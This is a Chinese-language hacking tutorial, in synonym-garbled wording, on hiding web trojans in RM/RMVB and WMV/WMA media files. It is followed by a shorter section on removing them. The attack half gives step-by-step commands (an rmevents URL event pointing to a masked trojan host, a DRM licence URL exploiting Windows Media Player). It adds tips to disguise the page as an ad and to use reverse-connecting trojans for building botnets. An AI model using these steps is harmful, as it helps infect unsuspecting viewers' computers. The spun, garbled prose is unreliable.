现在网络上撒播最为普遍的媒体文件有两类，一类是RM、RMVB文件，另一类是WMV、WMA文件，由于它们对流媒体的优越支持，使网络上的影戏、音乐等媒体文件险些都采用了这两种媒体文件花样，因此，若是在媒体文件中植入木马，那么媒体文件中木马独占的隐藏性将会使受害者在不知不觉中被网页木马损害，危害性可见一斑。 　　攻：媒体文件种马于无形 　　RM、RMVB中加入木马 　　Helix Producer Plus是一款图形化的专业流媒体文件制作工具，我们可以行使Helix Producer Plus这款软件把其他花样的文件转换成RM或RMVB花样，固然也可以对已存在的RM文件举行重新编辑，在编辑的同时，我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件，插入在其中的网页木马也会随之打开，我们甚至还能控制网页木马打开的时间，让网页木马更隐藏。 　　步骤1：首先下载Helix Producer Plus，一起“Next”完成安装，然后我们要找一个能把网页木马插入其中的RM影戏文件，把它改名为film.rm，然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。 　　步骤2：我们在这个文件夹中新建一个文本文档，命名为test.txt，在test.txt文件中写入这样一句下令：“u 00:07:00 00:07:30 http://www.***.com/index.php”，这句下令的意思是当媒体文件播放到第7分钟后触发打开URL事宜，然后到7分30秒的时刻事宜竣事，最后面的就是URL的网址，我们可以把这个网址改成我们的网页木马的地址（关于网页木马的制作和设置已经多次先容，在此不再重复），这样便可以在别人看媒体文件的时刻打开网页木马，让他不知不觉中招（如图1）。 　　小提醒：对于制作的网页木马应只管隐藏，并模拟正常网页，否则在看媒体文件时突然弹出网页谁都会有疑心，固然把它做成类似的广告网页效果最好，别人会以为是广告，便一关了之，而这时我们已经种马乐成了。对于木马的选择应只管使用具有反向毗邻的木马，如灰鸽子，否则纵然有了上百的肉鸡，一个一个去毗邻也是很贫苦的。 　　步骤3：运行CMD（下令提醒符），进入RealMediaEditor文件夹，输入下令：“rmevents -i film.rm -e test.txt -o film2.rm”，这是最要害的一步，意思是行使Helix Producer Plus自带的rmevents.exe把test.txt这个触发URL事宜合并到film.rm中，并另存为film2.rm。这个新天生的film2.rm即是我们需要的带有网页木马的媒体文件（如图2）。 WMV、WMA中加入木马 　　对于WMA、WMV文件，我们可以行使其默认的播放器Windows Media Player的“Microsoft Windows媒体播放器数字权限治理加载随便网页破绽”来插入木马。当我们播放已经插入木马的恶意文件时，播放器首先会弹出一个提醒窗口，说明此文件经由DRM加密需要通过URL验证证书，而这个URL就是我们事先设置好的网页木马地址，当用户点击“是”举行验证时，我们便种马乐成了。和RM文件种马一样，在WMV文件中插入木马我们还需要一样工具——WMDRM打包加密器，这是一款可以对WMA、WMV举行DRM加密的文件，软件自己是为了珍爱媒体文件的版权，但在攻击者手中，便成了黑客的帮凶。 　　安装“WMDRM打包加密器”，完成后运行，软件界面很简练（如图3）。首先泛起的是“自定义打包”标签，我们点击“源文件”右边的浏览按钮，选择一个WMA或WMV文件，然后我们在下面的“输出目录”里选择天生恶意文件的保留路径，然后在“输出文件后缀” 中填入天生的文件后缀，建媾和源文件保持一致。完成后我们切换到“认证字符串”标签， 在“认证URL”栏里输入我们的网页木马地址，如：http://www.***.com/index.php,其他保持默认即可。再切换到“自定义打包”标签，点击“打包加密’按钮，植有网页木马的恶意媒体文件就天生了。 　　当用户打开这个恶意媒体文件时，Windows Media Player会要求你获取证书（如图4），点击“确定”后就会弹出我们的网页木马。 　　有攻就有防，我们不能坐以待毙，任其宰割，实在恶意媒体文件不是我们想象中的那么神秘，只要我们掌握好一些消灭网页木马的小知识,就可以完全阻止网页木马运行。 防：恶意媒体，原形毕露 　　RM、RMVB木马消灭方式 　　我们以上文中制作RM木马的方式为例，新建一个内容为空的文本文件test.txt，然后在CMD中运行“rmevents -i 存在木马的媒体文件.rm -e test.txt -o film.rm”，这样便可以行使与插入木马相同的设施把触发URL事宜覆盖掉，这时输出的film.rm即是不存在木马的清洁媒体文件了。 　　若是对下令提醒符的使用不熟悉，我们使用Helix RealMedia Editor来消灭其中的网页木马。打开RealMediaEditor文件夹下的rmevents.exe文件，其界面如图5所示，同样新建一个内容为空的test.txt，然后在Helix RealMedia Editor的菜单栏中点击“Tools”，选择其中的“Merge Events”。接着选择我们适才建立的test.txt，点击“确定”。最后选择“File”菜单中的“Save RealMedia File”保留媒体文件即可，其原理和行使rmevents.exe消灭网页木马的原理是一样的。 　　WMA、WMV木马消灭方式 　　由于这是行使了Windows Media Player的破绽，因此我们不能消灭媒体文件中的恶意DRM加密信息，我们唯一可以做的就是打好补丁，恶意WMA、WMV文件对打过补丁的Windows Media Player将不起作用。补丁下载地址：http://www.microsoft.com/technet/security/此外，我们还可以选择其他的播放器来播放媒体文件，如狂风影音、Mplayer等，一些在媒体文件中插入网页木马事宜的功能在它们眼前将不起作用，因此这样也可以在一定程度上提防媒体网页木马。 　　平安在很大程度上取决于用户的平安意识，只有提高平安意识才气削减中招的概率，好比不打开生疏的媒体文件，不随意进入生疏的网站等，固然光有平安意识还不够，我们还需要杀毒软件等好帮手，究竟任何网页木马都需要先下载到内陆才气运行，而杀毒软件可以防止木马的运行，因此我们必须实时升级杀毒软件的病毒库。只有防先于攻，才气算得上是真正的平安。